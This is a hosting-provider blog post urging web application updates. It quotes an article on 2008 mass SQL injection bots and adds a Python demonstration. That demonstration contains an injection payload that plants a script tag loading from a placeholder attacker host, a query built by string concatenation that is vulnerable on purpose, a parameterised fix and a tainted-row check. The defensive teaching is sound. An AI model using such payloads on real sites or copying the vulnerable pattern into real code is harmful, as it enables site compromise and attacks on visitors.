SQL Attacks – How best to play it safe

We have always explained how important it is to keep your web applications up-to-date. From large forum software to the simplest of guestbooks, if even a minor update has been released for your software, you should upgrade *asap*.

Most web applications available today use some sort of “back-end” to store the data they collect and their configuration. In many of these cases that back-end is a SQL database.

Over the last year, those SQL back-ends have been one of the more popular targets for attackers trying to cripple a website or take control of the domain or server it runs on. They get in mostly through SQL injection flaws in the web applications themselves: user input pasted straight into a query without being checked, so that whatever the attacker types is run as SQL.

Don’t panic! This does not mean you should stop using these applications, or that no one is safe. What it means is that everyone has to keep current with what they are running, and compare the version they have against what is available.

One thing to always keep in mind is that “if man can create it, man can break it”. No matter who you are, there is no such thing as a perfect application. That is why you must always stay current with updates: the majority of them are patches for a newly found (or recently attacked) vulnerability.

For more information about the recent rise in attacks, here is an article found on eWeek by

SQL Attacks
Half a Million Sites Already Owned

Source:

A new research report delving further into the current epidemic of online SQL injection attacks maintains that over a half million sites were victimized by the threats during 2008 alone.

According to the Web Hacking Incidents Database (WHID) 2008 Annual Report issued by security appliance maker Breach Security on Tuesday, SQL threats that dropped malware onto affected sites far outnumbered any other type of attack rearing its head on the Internet last year.

The majority of the SQL injection campaigns delivered botnet programs onto machines infected by the sites they compromised, allowing the parties behind the attacks to use the devices to a number of different ends, from distributing spam to launching additional malware threats, the company said.

“The mass SQL Injection bot payload was a script that would alter the contents of the back-end database and inject malicious JavaScript,” Breach researchers conclude in the report. “The novel approach employed by these attacks was that the SQL Injection scripts could ‘generically’ enumerate and update the database tables all in one request.”

By cutting out a good deal of the manual research required of attackers in previous campaigns, the emergence of the “mass SQL injection bots” triggered an eruption of outbreaks, Breach maintains.

Breach Security Labs specifically tracked three major SQL-driven bots in 2008:

- Nihaorr1 Mass SQL Injection Bot
- Asprox Mass SQL Injection Bot
- Mass SQL Injection Bot Evolution

The techniques used by the involved attackers mix together a powerful cocktail of hacking and malware authoring expertise, the experts noted.

“While the initial attack vector was SQL Injection, the overall attack more closely resembles a Cross-Site Scripting methodology as the end goal of the attack was to have malicious JavaScript execute within victims’ browsers. The JavaScript calls up remote malicious code that attempts to exploit various known browser flaws to install Trojans and Keyloggers in order to steal login credentials to other Web applications,” the report contends.

Breach also highlighted another “notable attack methodology shift” in the fact that rather than targeting sensitive data in site databases, the threats were largely meant to victimize site visitors.

As the firm points out, the 2008 results should serve notice that infected URLs have really and truly become the most dangerous force in the world of cybercrime.

And that SQL injection, specifically, is the manner in which most of them are being corrupted.
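To make concrete what the report means by a payload that “would alter the contents of the back-end database and inject malicious JavaScript”, and what the flaw in a web application looks like that lets it in, here is an added Python example. It is not code from the original post or from the Breach report; it uses the standard library’s SQLite module so it runs anywhere. The table, its rows, the payload and the evil.example host are all constructed for illustration. The table name is hard-coded rather than enumerated from the database catalogue as the 2008 bots did, and executescript stands in for the database drivers of the time that accepted several statements in one request. The example shows a lookup built by string concatenation next to the same lookup as a parameterised query, plus the kind of check a site owner would run afterwards to see whether their rows have been tainted.

```python
import sqlite3

# Hypothetical product-catalogue schema and rows, constructed for this example.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        INSERT INTO products (name, description) VALUES ('Widget', 'A small widget');
        INSERT INTO products (name, description) VALUES ('Gadget', 'A useful gadget');
    """)
    return con

# Constructed payload of the shape the report describes: it closes the string the
# application opened, stacks an UPDATE that appends a <script> tag to every row's
# description, then opens a harmless SELECT so that the application's own trailing
# quote still parses. The host name is a placeholder, not a real malware domain.
SCRIPT_TAG = '<script src="http://evil.example/a.js"></script>'
PAYLOAD = (
    "x'; UPDATE products SET description = description || '"
    + SCRIPT_TAG
    + "'; SELECT '"
)

def lookup_vulnerable(con, name):
    """Builds the query by string concatenation and runs it through a path that
    allows stacked statements (executescript stands in for drivers that permitted
    this in 2008). Whatever the user typed becomes SQL. Returns the SQL that was
    actually sent so the reader can see the injected statement."""
    sql = f"SELECT id, name FROM products WHERE name = '{name}';"
    con.executescript(sql)
    return sql

def lookup_safe(con, name):
    """The same lookup as a parameterised query: the driver sends the value
    separately from the statement, so it is only ever compared, never parsed."""
    return con.execute(
        "SELECT id, name FROM products WHERE name = ?", (name,)
    ).fetchall()

def tainted_rows(con):
    """Post-incident check a site owner would run after a mass-injection wave:
    how many rows now carry a <script> tag in a text column."""
    return con.execute(
        "SELECT COUNT(*) FROM products WHERE description LIKE '%<script%'"
    ).fetchone()[0]

if __name__ == "__main__":
    con = make_db()
    print("sent to the database:", lookup_vulnerable(con, PAYLOAD))
    print("rows tainted via concatenation:", tainted_rows(con))            # 2

    con = make_db()
    print("rows matched by parameterised query:", lookup_safe(con, PAYLOAD))  # []
    print("rows tainted via parameterised query:", tainted_rows(con))       # 0
```

The two lookups differ by one line, which is the whole point: with the parameterised version the same payload is just a product name nobody has, and the table is untouched. The tainted_rows query is the simplest version of the check described in the report, a search of text columns for a <script> tag that the application never wrote itself, and is worth running against a copy of the database after any suspected injection incident.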
